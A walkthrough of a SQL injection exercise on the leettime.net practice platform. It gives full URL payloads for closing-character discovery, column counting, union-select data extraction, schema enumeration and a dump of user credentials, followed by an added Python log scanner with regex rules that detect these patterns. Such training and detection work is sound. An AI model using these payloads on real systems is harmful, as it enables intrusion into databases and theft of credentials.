SQL injection online practice platform (http://leettime.net)
Practice: basic module 4
1. Determine the closing character and the number of columns
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1
Displays the normal content.
Closing with a double quote " still shows the normal page, so the double quote is not the closing character.
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%22
Closing with a double quote followed by a single quote "' shows an error page, but this alone is not the complete closing sequence either.
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%22%27
The screenshot of the error shows that a parenthesis ) is also part of the original query.
Trying the closing sequence ') ... -- - succeeds:
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20or%201=1%20--%20-
Next, find the number of columns in the table:
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20order%20by%202%20--%20-
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20order%20by%204%20--%20-
order by 5 -- - produces an error, which shows that the table has 4 columns.
2. Find the data echo point and extract data
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,2,3,4%20--%20-
The second column is echoed back on the page, so it can be used to return query results.
Database name: leettime_761wHole
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,database(),3,4%20--%20-
Querying the installation path with @@basedir returns /usr/
Table names: testtable1,userlogs,users
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27leettime_761wHole%27),3,4%20--%20-
Column names: id,username,password,user_type,sec_code
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27leettime_761wHole%27%20and%20table_name=%27users%27),3,4%20--%20-
Username is : #injector#khan#,#decompiler#hacktract#,#devilhunte#dante#,#Zen#sec-idiots#,#Zenodermus#security-i#,#grayhat#hacker#,#khan#haxor#,#admin#sadmin#
http://leettime.net/sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,(select%20group_concat(0x23,username,0x23,password,0x23)%20from%20leettime_761wHole.users),3,4%20--%20-
Summary: get familiar with the structure of the information_schema tables, and pay attention to how group_concat is used.
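From the defender's side, every step of this walkthrough leaves a recognisable trace in the web server access log: the ') closing sequence, the order by column probes, the union select, the information_schema lookups and group_concat. The following Python script is an added example (not part of the original write-up or of the leettime.net platform) that URL-decodes the id parameter from constructed log lines and flags those patterns; the log format and IP addresses are made up for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed sample access-log lines: one benign request, then two of the
# request URLs shown in the walkthrough above (column probe, table listing).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /sqlninja.com/tasks/basic_ch4.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sqlninja.com/tasks/basic_ch4.php?id=1%27)%20order%20by%204%20--%20- HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /sqlninja.com/tasks/basic_ch4.php?id=1%27)%20%20and%201=2%20union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27leettime_761wHole%27),3,4%20--%20- HTTP/1.1" 200 1024
"""

# Detection rules, applied to each decoded and lower-cased parameter value.
RULES = [
    ("quote_paren_close", re.compile(r"'\s*\)")),            # the ') closing sequence
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+")),   # column-count probing
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("information_schema", re.compile(r"\binformation_schema\.")),
    ("group_concat", re.compile(r"\bgroup_concat\s*\(")),
    ("comment_tail", re.compile(r"--\s*-?\s*$")),            # trailing -- - comment
]

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def decode_params(url: str) -> dict:
    """Query parameters of a request URL; parse_qsl decodes once, and a second
    unquote catches double-encoded payloads."""
    query = urlsplit(url).query
    return {k: unquote_plus(v) for k, v in parse_qsl(query, keep_blank_values=True)}

def scan_line(line: str) -> dict:
    """Return {parameter: [matched rule names]} for one access-log line."""
    m = REQ_RE.search(line)
    if not m:
        return {}
    hits = {}
    for name, value in decode_params(m.group(1)).items():
        matched = [rule for rule, rx in RULES if rx.search(value.lower())]
        if matched:
            hits[name] = matched
    return hits

def scan_log(text: str) -> list:
    """Return (line_number, hits) for every log line that triggered a rule."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            findings.append((n, hits))
    return findings

if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG):
        print(f"line {n}: {hits}")
```

Matching several rules on one request (closing sequence plus union select plus information_schema) is a much stronger signal than any single rule, so an alert threshold should count distinct rules per request rather than firing on the first hit.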
https://zhuanlan.zhihu.com/p/76518525